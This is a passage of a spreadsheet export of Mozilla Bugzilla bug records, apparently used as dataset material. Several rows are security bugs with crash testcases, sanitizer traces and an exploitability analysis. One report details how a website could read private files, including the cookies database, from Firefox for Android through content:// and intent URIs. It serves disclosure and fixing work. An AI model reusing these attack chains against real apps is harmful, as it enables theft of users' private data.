          <t>2010-02-01 04:14:58 -0800</t>
        </is>
      </c>
      <c r="C4663" t="inlineStr">
        <is>
          <t>Crash [@ JSFunctionBox::joinable] or [@ JSCompiler::setFunctionKinds]</t>
        </is>
      </c>
      <c r="D4663" t="inlineStr">
        <is>
          <t>2013-01-19 14:34:07 -0800</t>
        </is>
      </c>
      <c r="E4663" t="n">
        <v>1</v>
      </c>
      <c r="F4663" t="n">
        <v>1</v>
      </c>
      <c r="G4663" t="n">
        <v>3</v>
      </c>
      <c r="H4663" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4663" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4663" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4663" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4663" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4663" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4663" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4663" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4663" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey [ccbr]</t>
        </is>
      </c>
      <c r="Q4663" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4663" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4663" t="inlineStr">
        <is>
          <t>mozilla1.9.3a2</t>
        </is>
      </c>
      <c r="T4663" t="n">
        <v>1</v>
      </c>
      <c r="U4663" t="n">
        <v>0</v>
      </c>
      <c r="V4663" t="n">
        <v>8</v>
      </c>
      <c r="W4663" t="inlineStr">
        <is>
          <t>(function() {
  try {
    eval("\
      function() {\
        if (3)\
        (1 for (x in []));\
        else \
        (this._ = function(){})\
      }\
    ");
  } catch(e) {}
})()
crashes js debug shell on TM tip without -j at JSFunctionBox::joinable near null and crashes js opt shell on TM tip without -j at JSCompiler::setFunctionKinds near null.
autoBisect shows this is probably related to bug 536564:
The first bad revision is:
changeset:   37039:f6b37dc8709e
user:        Brendan Eich
date:        Thu Jan 14 14:22:00 2010 -0800
summary:     Fast followup fix for thinko (536564, r=jorendorff).
===
js opt shell stacktrace:
Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000008
Crashed Thread:  0  Dispatch queue: com.apple.main-thread
Thread 0 Crashed:  Dispatch queue: com.apple.main-thread
0   js-opt-32-tm-darwin           	0x0008f64d JSCompiler::setFunctionKinds(JSFunctionBox*, unsigned int&amp;) + 429
1   js-opt-32-tm-darwin           	0x000a2b7b JSCompiler::compileScript(JSContext*, JSObject*, JSStackFrame*, JSPrincipals*, unsigned int, unsigned short const*, unsigned long, __sFILE*, char const*, unsigned int, JSString*, unsigned int) + 955
2   js-opt-32-tm-darwin           	0x0007367a obj_eval(JSContext*, JSObject*, unsigned int, long*, long*) + 2362
3   js-opt-32-tm-darwin           	0x0005f8ac js_Invoke + 1180
4   js-opt-32-tm-darwin           	0x0005540f js_Interpret + 25007
5   js-opt-32-tm-darwin           	0x0005f0c1 js_Execute + 625
6   js-opt-32-tm-darwin           	0x0000debc JS_ExecuteScript + 60
7   js-opt-32-tm-darwin           	0x00004c28 Process(JSContext*, JSObject*, char*, int) + 1336
8   js-opt-32-tm-darwin           	0x00008ca6 main + 1734
9   js-opt-32-tm-darwin           	0x00002bcd _start + 208
10  js-opt-32-tm-darwin           	0x00002afc start + 40</t>
        </is>
      </c>
      <c r="X4663" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4664">
      <c r="A4664" t="n">
        <v>621109</v>
      </c>
      <c r="B4664" t="inlineStr">
        <is>
          <t>2010-12-22 23:48:33 -0800</t>
        </is>
      </c>
      <c r="C4664" t="inlineStr">
        <is>
          <t>Column changing lacks CSRF protection</t>
        </is>
      </c>
      <c r="D4664" t="inlineStr">
        <is>
          <t>2011-01-22 09:19:04 -0800</t>
        </is>
      </c>
      <c r="E4664" t="n">
        <v>1</v>
      </c>
      <c r="F4664" t="n">
        <v>1</v>
      </c>
      <c r="G4664" t="n">
        <v>4</v>
      </c>
      <c r="H4664" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4664" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4664" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4664" t="inlineStr">
        <is>
          <t>3.6.3</t>
        </is>
      </c>
      <c r="L4664" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4664" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4664" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4664" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4664" t="inlineStr">
        <is>
          <t>[infrasec:csrf][ws:low]</t>
        </is>
      </c>
      <c r="Q4664" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4664" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S4664" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T4664" t="n">
        <v>1</v>
      </c>
      <c r="U4664" t="n">
        <v>0</v>
      </c>
      <c r="V4664" t="n">
        <v>8</v>
      </c>
      <c r="W4664" t="inlineStr">
        <is>
          <t>colchange.cgi doesn't have any CSRF protection.</t>
        </is>
      </c>
      <c r="X4664" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4665">
      <c r="A4665" t="n">
        <v>463350</v>
      </c>
      <c r="B4665" t="inlineStr">
        <is>
          <t>2008-11-05 20:39:17 -0800</t>
        </is>
      </c>
      <c r="C4665" t="inlineStr">
        <is>
          <t>Crash [@ GetLastSpecialSibling] with -moz-column, fieldset, select</t>
        </is>
      </c>
      <c r="D4665" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E4665" t="n">
        <v>1</v>
      </c>
      <c r="F4665" t="n">
        <v>1</v>
      </c>
      <c r="G4665" t="n">
        <v>3</v>
      </c>
      <c r="H4665" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4665" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4665" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4665" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4665" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4665" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4665" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4665" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4665" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q4665" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4665" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4665" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4665" t="n">
        <v>1</v>
      </c>
      <c r="U4665" t="n">
        <v>0</v>
      </c>
      <c r="V4665" t="n">
        <v>32</v>
      </c>
      <c r="W4665" t="inlineStr">
        <is>
          <t>Created attachment 346609
testcase (crashes Firefox when loaded)
This testcase causes GetLastSpecialSibling to call 0 or 0xdddddddd.</t>
        </is>
      </c>
      <c r="X4665" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4666">
      <c r="A4666" t="n">
        <v>531107</v>
      </c>
      <c r="B4666" t="inlineStr">
        <is>
          <t>2009-11-25 10:43:03 -0800</t>
        </is>
      </c>
      <c r="C4666" t="inlineStr">
        <is>
          <t>[Windows] Enabling a extension results in "deep recursion on subroutine" warnings</t>
        </is>
      </c>
      <c r="D4666" t="inlineStr">
        <is>
          <t>2009-12-01 01:42:31 -0800</t>
        </is>
      </c>
      <c r="E4666" t="n">
        <v>1</v>
      </c>
      <c r="F4666" t="n">
        <v>1</v>
      </c>
      <c r="G4666" t="n">
        <v>4</v>
      </c>
      <c r="H4666" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4666" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4666" t="inlineStr">
        <is>
          <t>Extensions</t>
        </is>
      </c>
      <c r="K4666" t="inlineStr">
        <is>
          <t>3.5.2</t>
        </is>
      </c>
      <c r="L4666" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4666" t="inlineStr">
        <is>
          <t>Windows Server 2008</t>
        </is>
      </c>
      <c r="N4666" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4666" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4666" t="inlineStr"/>
      <c r="Q4666" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4666" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4666" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T4666" t="n">
        <v>1</v>
      </c>
      <c r="U4666" t="n">
        <v>0</v>
      </c>
      <c r="V4666" t="n">
        <v>8</v>
      </c>
      <c r="W4666" t="inlineStr">
        <is>
          <t>Created attachment 414522
Perl Command Line Interpreter has stopped working
Also Applies to Windows 7 (and likely Windows Vista)
Code Base: CVS TIP 3.5.2+
Reproducible Always
To Reproduce:
1. delete extensions/Example/disabled
2. Run checksetup or if in a mod_perl environment apache -t
Results:
Deep recursion on subroutine "Bugzilla::Extension::__do_call" at Bugzilla/Extension.pm line 189.
Deep recursion on subroutine "Bugzilla::Extension::__do_call" at Bugzilla/Extension.pm line 159.
Deep recursion on anonymous subroutine at C:/usr/lib/File/Spec/Win32.pm line 92.
Deep recursion on subroutine "Bugzilla::Extension::__do_call" at Bugzilla/Extension.pm line 153.
Deep recursion on subroutine "Bugzilla::Extension::my_inc" at Bugzilla/Extension.pm line 210.
Deep recursion on subroutine "File::Spec::Win32::case_tolerant" at Bugzilla/Extension.pm line 166.
Followed by windows "Perl Command Line Interpreter has stopped working"
Notes:
If no extensions are enable, no errors occur.</t>
        </is>
      </c>
      <c r="X4666" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4667">
      <c r="A4667" t="n">
        <v>1647078</v>
      </c>
      <c r="B4667" t="inlineStr">
        <is>
          <t>2020-06-20 07:34:52 -0700</t>
        </is>
      </c>
      <c r="C4667" t="inlineStr">
        <is>
          <t>content:// provider allows websites to remotely steal any file from the device if the path is known</t>
        </is>
      </c>
      <c r="D4667" t="inlineStr">
        <is>
          <t>2024-05-30 10:15:53 -0700</t>
        </is>
      </c>
      <c r="E4667" t="n">
        <v>1</v>
      </c>
      <c r="F4667" t="n">
        <v>1</v>
      </c>
      <c r="G4667" t="n">
        <v>6</v>
      </c>
      <c r="H4667" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4667" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4667" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4667" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4667" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4667" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4667" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4667" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4667" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey]</t>
        </is>
      </c>
      <c r="Q4667" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4667" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4667" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4667" t="n">
        <v>1</v>
      </c>
      <c r="U4667" t="n">
        <v>0</v>
      </c>
      <c r="V4667" t="n">
        <v>87</v>
      </c>
      <c r="W4667" t="inlineStr">
        <is>
          <t>Created attachment 9158004
attachments.zip
The following report is in Markdown format, consider using a reader for better experience.
## Environment
- **Device:** HTC m8
- **OS version:** Android 9
- **Package name:** org.mozilla.firefox
- **App version:** 68.9.0 (`versionCode` 2015701353) (stable channel)
---
## Proof of concept
### Pre-conditions:
- Firefox installed
- Python3 installed
- ngrok (optional for easy tunneling)
### Steps:
- Start the `server.py` (see attachments) using the following command:
  ```
  $ python3 server.py &lt;WEBSITE&gt; &lt;PORT_TO_LISTEN&gt;
  ```
  The `&lt;WEBSITE&gt;` is the URL that is going to be opened in the device without scheme (Examples: `192.1.1.1`, `myDomain.com`, `192.6.1.3:8080`).
  The `&lt;PORT&gt;` is the port for the server
- Open the website above in Firefox for Android
### Result
- A javascript alert is shown with the contents of the cookies database
### Expected result
- No private file should be accessed
---
## Detailed explanation
When the webiste is opened in Firefox, a webpage is served that contains a `&lt;iframe&gt;` that downloads a file named `profile.ini` to `/sdcard/Download/profile.ini` and opens it after a short delay using this `href`:
```
android-app://org.mozilla.firefox/content/org.mozilla.firefox.fileprovider/root/sdcard/Download/profiles.ini#Intent;type=text/html;end
```
This Intent orders Firefox to open the URI `content://org.mozilla.firefox.fileprovider/root/sdcard/Download/profiles.ini`. Firefox will download this `content://` URI to `/data/data/org.mozilla.firefox/cache/contentUri` while rendering it. The name is maintained so a new file called `/data/data/org.mozilla.firefox/cache/contentUri/profiles.ini` has been now created.
The contents of `profile.ini` can be seen in `server.py` (method `get_profiles_html`) but basically it's a HTML page that contains an `&lt;iframe&gt;` that loads another `content://` URI and trigger a javascript function after a while (more info bellow). 
The URI loaded is:
```
content://org.mozilla.firefox.fileprovider/data/user/0/org.mozilla.firefox/files/mozilla/profiles.ini
```
This provider is misconfigured and contains the following entry in its XML configuration file (`provider_paths.xml`):
```xml
&lt;paths xmlns:android="http://schemas.android.com/apk/res/android"&gt;
    &lt;root-path name="root" path="."/&gt;
&lt;/paths&gt;
```
Firefox is using `root-path` with path `.` which essentially allows all files to be resolved by this provider. This allows private files from Firefox to be accessed. 
The logic to download the file from a `content://` URI is rewriting the file, so the contents of `profile.ini` (the current page loaded) were now overriden and contains the values of `/data/user/0/org.mozilla.firefox/files/mozilla/profiles.ini`.
After the above `&lt;iframe&gt;` is loaded, the javascript function triggers. This javascript reads the contents of the current page (this bypass CORS protections because the file is the same). The current page is now the `profiles.ini` file from Firefox. This file contains the path to the cookies directory. After the path has been retrieved from the file, it repeats the process again but for `/data/user/0/org.mozilla.firefox/files/mozilla/&lt;PATH&gt;/cookies.sqlite`. 
**Resuming: **
This is a combination of multiple misconfigurations/flawed logic:
- Firefox allows private files to be opened in it
- Content provider from Firefox allows private file inclusion
- Files downloaded from content providers with the same name are downloaded to the same place.
---
## Vulnerable code
 - `res/xml/provider_paths.xml`
```
&lt;root-path name="root" path="."/&gt;
```
---
## Remediation
Firefox should not allow private files to be accessed by it's provider. A suggested fix here is to use instead:
```
&lt;root-path name="root" path="/storage/"/&gt;
```
Firefox should also not override the contents from `contentUri` otherwise it'll be possible to override the contents of a file and retrieve it afterwards.
---
## Attachments
- server.py 
  Python3 server containg the full proof of concept.
- video.mp4
  A video showing the exploit in action.
---
## Impact
- Remote file steal of cookies or any other file if the attacker knows the path which is easy for common applications.</t>
        </is>
      </c>
      <c r="X4667" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4668">
      <c r="A4668" t="n">
        <v>507292</v>
      </c>
      <c r="B4668" t="inlineStr">
        <is>
          <t>2009-07-29 17:25:52 -0700</t>
        </is>
      </c>
      <c r="C4668" t="inlineStr">
        <is>
          <t>Incorrect upvar access on trace involving top-level scripts</t>
        </is>
      </c>
      <c r="D4668" t="inlineStr">
        <is>
          <t>2013-03-11 11:23:21 -0700</t>
        </is>
      </c>
      <c r="E4668" t="n">
        <v>1</v>
      </c>
      <c r="F4668" t="n">
        <v>1</v>
      </c>
      <c r="G4668" t="n">
        <v>3</v>
      </c>
      <c r="H4668" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4668" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4668" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4668" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4668" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4668" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4668" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4668" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4668" t="inlineStr">
        <is>
          <t>[sg:critical?], fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4668" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4668" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4668" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4668" t="n">
        <v>1</v>
      </c>
      <c r="U4668" t="n">
        <v>0</v>
      </c>
      <c r="V4668" t="n">
        <v>43</v>
      </c>
      <c r="W4668" t="inlineStr">
        <is>
          <t>BuildID=20090727101705
Steps to reproduce: Load http://www.warcraftlatino.com/ulduar/rank.html
(c20.bb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=04859130 ebx=7ffdf000 ecx=072a0410 edx=c0000005 esi=0000000f edi=00c8f6f0
eip=00519bd4 esp=0012e718 ebp=0012ee44 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
js3250!js_Interpret+0x103b4:
00519bd4 8b02            mov     eax,dword ptr [edx]  ds:0023:c0000005=????????
0:000&gt; !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0xffffffffc0000005
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation
Faulting Instruction:00519bd4 mov eax,dword ptr [edx]
Basic Block:
    00519bd4 mov eax,dword ptr [edx]
       Tainted Input Operands: edx
    00519bd6 mov ecx,dword ptr [eax+0ch]
       Tainted Input Operands: eax
    00519bd9 call ecx
       Tainted Input Operands: ecx, edx
Exception Hash (Major/Minor): 0x2a690d26.0x1548251d
Stack Trace:
js3250!js_Interpret+0x103b4
js3250!js_Execute+0x2e6
js3250!JS_EvaluateUCScriptForPrincipals+0xe7
gklayout!nsJSContext::EvaluateString+0x2c0
gklayout!nsScriptLoader::EvaluateScript+0x37a
gklayout!nsScriptLoader::ProcessRequest+0xfd
gklayout!nsScriptLoader::ProcessScriptElement+0x1040
gklayout!nsScriptElement::MaybeProcessScript+0x149
gklayout!nsHTMLScriptElement::MaybeProcessScript+0x24
gklayout!nsHTMLScriptElement::DoneAddingChildren+0x1f
gklayout!HTMLContentSink::ProcessSCRIPTEndTag+0xcf
gklayout!SinkContext::CloseContainer+0x31d
gklayout!HTMLContentSink::CloseContainer+0xa0
gkparser!CNavDTD::CloseContainer+0x18a
gkparser!CNavDTD::HandleEndToken+0x214
gkparser!CNavDTD::HandleToken+0x4ae
gkparser!CNavDTD::BuildModel+0x298
gkparser!nsParser::BuildModel+0xe2
gkparser!nsParser::ResumeParse+0x1bc
gkparser!nsParser::ContinueInterruptedParsing+0xe5
gklayout!nsContentSink::ContinueInterruptedParsingIfEnabled+0x54
gklayout!nsRunnableMethod&lt;nsContentSink&gt;::Run+0x24
xpcom_core!nsThread::ProcessNextEvent+0x1fa
xpcom_core!NS_ProcessNextEvent_P+0x53
gkwidget!nsBaseAppShell::Run+0x5d
tkitcmps!nsAppStartup::Run+0x6b
xul!XRE_main+0x3000
firefox!NS_internal_main+0x2b2
firefox!wmain+0x119
firefox!__tmainCRTStartup+0x1a6
firefox!wmainCRTStartup+0xd
kernel32!BaseProcessStart+0x23
Instruction Address: 0x0000000000519bd4
Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at js3250!js_Interpret+0x00000000000103b4 (Hash=0x2a690d26.0x1548251d)
The data from the faulting address is later used as the target for a branch.</t>
        </is>
      </c>
      <c r="X4668" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4669">
      <c r="A4669" t="n">
        <v>1328323</v>
      </c>
      <c r="B4669" t="inlineStr">
        <is>
          <t>2017-01-03 10:02:00 -0800</t>
        </is>
      </c>
      <c r="C4669" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow read in ColorComponentAtPoint</t>
        </is>
      </c>
      <c r="D4669" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:42 -0700</t>
        </is>
      </c>
      <c r="E4669" t="n">
        <v>1</v>
      </c>
      <c r="F4669" t="n">
        <v>1</v>
      </c>
      <c r="G4669" t="n">
        <v>3</v>
      </c>
      <c r="H4669" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4669" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4669" t="inlineStr">
        <is>
          <t>Graphics: Color Management</t>
        </is>
      </c>
      <c r="K4669" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4669" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4669" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4669" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4669" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4669" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+] probably fixed by 1329849</t>
        </is>
      </c>
      <c r="Q4669" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4669" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4669" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T4669" t="n">
        <v>1</v>
      </c>
      <c r="U4669" t="n">
        <v>0</v>
      </c>
      <c r="V4669" t="n">
        <v>4</v>
      </c>
      <c r="W4669" t="inlineStr">
        <is>
          <t>Created attachment 8823357
SVG image testcase (CRASHES affected versions)
Tested on:
OS: Ubuntu 16.04 
Firefox: ASAN build of moz_source_stamp: 2bd53e4e662bcdd32c53cb4e09ceff088e8f6369
Minimized repro-file as an attachment.
ASAN-trace:
=================================================================
==18497==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2f4ae127ff at pc 0x7f2f82468ba2 bp 0x7ffcbafc13d0 sp 0x7ffcbafc13c8
READ of size 1 at 0x7f2f4ae127ff thread T0
    #0 0x7f2f82468ba1 in ColorComponentAtPoint /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2279:10
    #1 0x7f2f82468ba1 in GenerateNormal&lt;int&gt; /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3439
    #2 0x7f2f82468ba1 in DoRender&lt;int&gt; /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3537
    #3 0x7f2f82468ba1 in mozilla::gfx::FilterNodeLightingSoftware&lt;mozilla::gfx::(anonymous namespace)::DistantLightSoftware, mozilla::gfx::(anonymous namespace)::DiffuseLightingSoftware&gt;::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3464
    #4 0x7f2f823f2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:613:21
    #5 0x7f2f823fc34e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14:17
    #6 0x7f2f8242b2a4 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3126:10
    #7 0x7f2f823f2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:613:21
    #8 0x7f2f823bd6db in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:566:14
    #9 0x7f2f824c9f41 in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, nsTArray&lt;RefPtr&lt;mozilla::gfx::SourceSurface&gt; &gt;&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:3
    #10 0x7f2f876843ce in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:510:3
    #11 0x7f2f876837e0 in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&amp;, nsSVGFilterPaintCallback*, nsRegion const*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:79:10
.
.
.
0x7f2f4ae127ff is located 1 bytes to the left of 260175-byte region [0x7f2f4ae12800,0x7f2f4ae5204f)
allocated by thread T0 here:
    #0 0x4b24ab in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7f2f824a71c3 in Realloc /home/worker/workspace/build/src/gfx/2d/Tools.h:181:41
    #2 0x7f2f824a71c3 in mozilla::gfx::SourceSurfaceAlignedRawData::Init(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat, bool, unsigned char, int) /home/worker/workspace/build/src/gfx/2d/SourceSurfaceRawData.cpp:66
    #3 0x7f2f823875a8 in mozilla::gfx::Factory::CreateDataSourceSurface(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat, bool) /home/worker/workspace/build/src/gfx/2d/Factory.cpp:818:7
    #4 0x7f2f8240ef08 in mozilla::gfx::FilterProcessing::ExtractAlpha(mozilla::gfx::DataSourceSurface*) /home/worker/workspace/build/src/gfx/2d/FilterProcessing.cpp:16:37
    #5 0x7f2f82466882 in DoRender&lt;int&gt; /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3503:13
    #6 0x7f2f82466882 in mozilla::gfx::FilterNodeLightingSoftware&lt;mozilla::gfx::(anonymous namespace)::DistantLightSoftware, mozilla::gfx::(anonymous namespace)::DiffuseLightingSoftware&gt;::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3464
    #7 0x7f2f823f2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:613:21
    #8 0x7f2f823fc34e in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:714:17
    #9 0x7f2f8242b2a4 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3126:10
